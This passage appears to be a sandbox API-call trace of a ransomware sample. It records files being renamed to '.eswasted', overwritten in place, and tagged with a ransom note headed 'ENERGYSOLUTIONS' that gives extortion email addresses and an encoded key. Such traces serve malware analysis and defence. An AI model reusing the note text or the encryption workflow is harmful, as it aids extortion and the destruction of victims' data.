[0085.292] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4d91a8 [0085.292] lstrcpyW (in: lpString1=0x4d921e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.293] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea258 [0085.293] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0085.293] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea258 | out: pbBuffer=0x4ea258) returned 1 [0085.293] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0085.294] WriteFile (in: hFile=0x100, lpBuffer=0x4ea258*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ea258*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0085.295] SetEndOfFile (hFile=0x100) returned 1 [0085.295] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.295] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea258 | out: hHeap=0x4a0000) returned 1 [0085.295] lstrcpyW (in: lpString1=0x4d921e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.eswasted")) returned 1 [0085.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0085.298] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0085.298] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x8907c [0085.298] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8907c) returned 0x1220000 [0085.298] CloseHandle (hObject=0x110) returned 1 [0085.353] UnmapViewOfFile (lpBaseAddress=0x1220000) returned 1 [0085.361] CloseHandle (hObject=0x120) returned 1 [0085.361] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea258 [0085.361] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0085.362] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2a0 | out: pbBuffer=0x4ea2a0) returned 1 [0085.362] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.362] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0085.363] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0085.363] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.372] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea460 [0085.372] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea258 | out: hHeap=0x4a0000) returned 1 [0085.372] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.372] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kAv1aABf1GWIUDtyAD7qTIZKdi7labuBo+5pWDk97GqOsD03AC5kKjwLUe3PL17q\r\nLPgSYlX6Pp1wTrpSDuqnTDi6ByPooyNEASDClbGTxO2du4WFe9Nw+QHlnUqJ0QkP\r\nVT5Oxz06/CgsPHWhiyTNrRFcjFns/qTnNsK9InKRuIspPUkjQA/ZTCqywWnEdWvM\r\nRoJHTuMkPOnQyRhrhrYezkjuCFPobGwZor9VVE0y21wadf8VdK9mVJXl4KofegSK\r\nW9KK/UmfqLCJui312JO5DghJsW2pgnRiwzw8MiQZYiUw5fu0G8rOD4cgvFrSB4Vn\r\nwQlkeNjvd92+xgfZa4HU3enap/c6N2Hk6CJFhV5zO57XYxt8aXbrkGteD6jE6WDf\r\nm8nNrzO1zpaaKjIM9mwM4EeoH2+csABmocI6c1JnxFDfT6efCm8mj44MjV9efUss\r\nwWBNzbzEnmSfU1zrx8u+IwnrxcWomZ3TYs+tmApAUYekvIHJ+BwKrX16zoe18WL1\r\nXJwAW5jUOcenzwzsVde9YcHqVC34jn3sV4rbU68h1ZUB+V0z09ab25sPoB5sqTgE\r\nqNNEQTK+R6TVj4oyMbVwwKk8LN4Pgfb6GnQcw/CaX9eIODB08eR1++hzoQNcLsl5\r\nYwHdsrJDQ2zrjXOSQX5RdieTriOfIhqb+5H1HhTKcp/=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.372] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea460 | out: hHeap=0x4a0000) returned 1 [0085.372] WriteFile (in: hFile=0x100, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0085.372] SetEndOfFile (hFile=0x100) returned 1 [0085.374] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.374] CloseHandle (hObject=0x100) returned 1 [0085.374] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0085.375] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4f88 | out: hHeap=0x4a0000) returned 1 [0085.375] _aulldvrm () returned 0x0 [0085.375] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0085.399] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0085.400] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.400] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0085.400] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4e9fd8 [0085.400] lstrcpyW (in: lpString1=0x4ea04a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.400] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea260 [0085.400] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0085.401] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea260 | out: pbBuffer=0x4ea260) returned 1 [0085.401] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0085.402] WriteFile (in: hFile=0xfc, lpBuffer=0x4ea260*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ea260*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0085.403] SetEndOfFile (hFile=0xfc) returned 1 [0085.403] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.403] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.403] lstrcpyW (in: lpString1=0x4ea04a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.eswasted")) returned 1 [0085.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.405] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0085.405] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xbde6b [0085.405] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbde6b) returned 0x12c0000 [0085.405] CloseHandle (hObject=0x120) returned 1 [0085.496] UnmapViewOfFile (lpBaseAddress=0x12c0000) returned 1 [0085.508] CloseHandle (hObject=0x110) returned 1 [0085.511] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0085.514] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0085.545] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0085.545] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.545] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0085.546] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0085.546] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea260 [0085.554] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0085.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.555] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]f08Yg0ZsQ6WlRu7mu/fXaiX5BOs/frA2+F2h5x2PpUWgfUFM6jfxDiOqwbvsBh5i\r\n0Rm+t8y1cVQXl6e/2N9WsHYrF+1JADTK6evAa/cIGWtQfWa5j9jSLllsxpSwd/g4\r\nbsSC06FlpNjt0N+FNK/0fweWDbA3KHtRBjtfdnuItP1W0RhyMP8INdvwl1Txjsv+\r\nxXJZlfRf0COrfD1bddqzupLrNsv6jrDtAfqb4ji6n3XrJOxveFSMZwn1yd1sxpwI\r\n2DFBNCMfBsaZBqk/LkvvDlHLJtlOfVwDLfQzK4uECA8eLK2c90PqEd4xR5FuB7JV\r\naJ7u3OOkPgJ9NB6VLLPg8+4y4MD94j1s1R3V1J0bFSNfJOq1HnkvU/Yjd2AHTWhv\r\nlRYZGALp1ZledEW5LT2diZG8h0dKE4dq/kDmaqnP35EJ9uro7QGmvae2kn5d1KJi\r\ncnsd6+WuXdYAJgeAp3iEhz+kEihn1Ic3az4N6xwjzejcGitP0krVuALyoSBUj8ke\r\nhwWtUtceVWr3eUdOhcFM6aTSNv2OW1SsYhuS8IM10ZMPCddERhPheZM2nOz0HGui\r\n7o6diquuQNh84IUEobSnWHEqFFA2ZsRvOf+37dH2+lgKn3qHkWNIKjqVMdBjNmaq\r\nU5xvyth5lKFw6AoiWWhNeKxH6c5X/g/qGGMd+TozX84=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.555] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.555] WriteFile (in: hFile=0xfc, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0085.555] SetEndOfFile (hFile=0xfc) returned 1 [0085.557] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.557] CloseHandle (hObject=0xfc) returned 1 [0085.557] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0085.557] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5058 | out: hHeap=0x4a0000) returned 1 [0085.557] ResetEvent (hEvent=0xec) returned 1 [0085.557] _aulldvrm () returned 0x0 [0085.557] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0085.558] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0085.558] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.558] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0085.558] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4d91a8 [0085.558] lstrcpyW (in: lpString1=0x4d9212, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.558] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0085.558] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0085.559] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0085.559] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.eswasted_info" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0085.560] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0085.561] SetEndOfFile (hFile=0xfc) returned 1 [0085.561] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.561] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0085.561] lstrcpyW (in: lpString1=0x4d9212, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.eswasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.eswasted")) returned 1 [0085.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.eswasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0085.562] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0085.562] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x1907b8a [0085.562] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1907b8a) returned 0x1cc0000 [0085.563] CloseHandle (hObject=0x110) returned 1 [0099.277] UnmapViewOfFile (lpBaseAddress=0x1cc0000) returned 1 [0099.596] CloseHandle (hObject=0x100) returned 1 [0099.596] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4e9fd8 [0099.596] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0099.598] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea020 | out: pbBuffer=0x4ea020) returned 1 [0099.598] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0099.599] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0099.600] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0099.600] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0099.610] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea1e0 [0099.610] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0099.610] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0099.610] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nN6S1m/9vWa27A7i5u+42X8g63dAK9Ccxu50FYEYuaNdlCWAJmT2QOVWQY13BBOY\r\ne9spi3kQjJD9HI74+kmeRihPDoKFJ32X88pbCOVM5fAGilucLzstWQvmjvchJVXY\r\nyR4ZVLcg2W+Ifex0DvlZVY3jad7JBHd6QqPyAJ1Yzf5Wq8+ohcMe5XtdehCGQvT/\r\nYqzFuEU2Qk7rfPyRlpmtA/HcptuvwODKyO6Cq+WDAfwVzvW6cGwHRigkZz4WgOtP\r\nfqblRZ8QySb7MUKt7XbAwFiowtAYIY83HTCqEUeP0M+h3Qa+mkodXTT6cyDHofqu\r\nGCKdPbLymhvEzhKYD1YA3MzcYGL5ak0pOrz6awWquIjTC67z410hsYUCC7g/4KBO\r\ndaHGzq7GUc43i6Snsdmfqa0DFGdYM49SHnvLlIwKtOI99zKYn6ZoYPiozixYfVSE\r\n0GWc1kkqif6y7i2mKgNo5l/9BqCNVVeasWvobeBPDIQ2gSFqhppATj2qTuoAFAjm\r\nDSCum/5rYH7yrVdgSYoqmOG/R7nhFKPzl0R1yEC4QrI+XmElc8EMzw6zTn8xnCiG\r\nS54g8ywXMU2H2iaiu3RcvUesBj1OESYJm7poM33zDBihXS4EiVcZSkEAT4yL1sVg\r\n3wuAzeuot1PKq6oVbC05KJRH8FmWatTnjs+1LfSlWJy=[end_key]\r\nKEEP IT\r\n") returned 990 [0099.610] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea1e0 | out: hHeap=0x4a0000) returned 1 [0099.610] WriteFile (in: hFile=0xfc, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0099.611] SetEndOfFile (hFile=0xfc) returned 1 [0099.614] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0099.614] CloseHandle (hObject=0xfc) returned 1 [0099.614] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0099.614] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dfe58 | out: hHeap=0x4a0000) returned 1 [0099.614] SetEvent (hEvent=0xec) returned 1 [0099.616] WaitForSingleObject (hHandle=0xf4, dwMilliseconds=0xffffffff) returned 0x0 [0099.616] CloseHandle (hObject=0xf4) returned 1 [0099.616] CloseHandle (hObject=0xec) returned 1 [0099.616] CloseHandle (hObject=0x90) returned 1 [0099.616] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c3f40 | out: hHeap=0x4a0000) returned 1 [0099.616] _snprintf (in: _Dest=0x111feec, _Count=0x21, _Format="%u %u %u" | out: _Dest="331 327 4") returned 9 [0099.616] WriteFile (in: hFile=0xe8, lpBuffer=0x111feec*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x111ff80, lpOverlapped=0x0 | out: lpBuffer=0x111feec*, lpNumberOfBytesWritten=0x111ff80*=0x9, lpOverlapped=0x0) returned 1 [0099.617] SetEndOfFile (hFile=0xe8) returned 1 [0099.621] CloseHandle (hObject=0xe8) returned 1 Thread: id = 332 os_tid = 0x93c [0069.339] WaitForMultipleObjects (nCount=0x2, lpHandles=0x121ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0069.340] _aulldvrm () returned 0x0 [0069.340] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4108) returned 1 [0069.340] CryptGenRandom (in: hProv=0x4c4108, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0069.340] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0069.340] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0069.340] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4d91a8 [0069.341] lstrcpyW (in: lpString1=0x4d9246, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0069.341] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4d9458 [0069.341] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4d9ea8) returned 1 [0069.341] CryptGenRandom (in: hProv=0x4d9ea8, dwLen=0xa46, pbBuffer=0x4d9458 | out: pbBuffer=0x4d9458) returned 1 [0069.341] CryptReleaseContext (hProv=0x4d9ea8, dwFlags=0x0) returned 1 [0069.341] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0069.346] WriteFile (in: hFile=0x10c, lpBuffer=0x4d9458*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4d9458*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0069.347] SetEndOfFile (hFile=0x10c) returned 1 [0069.347] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | 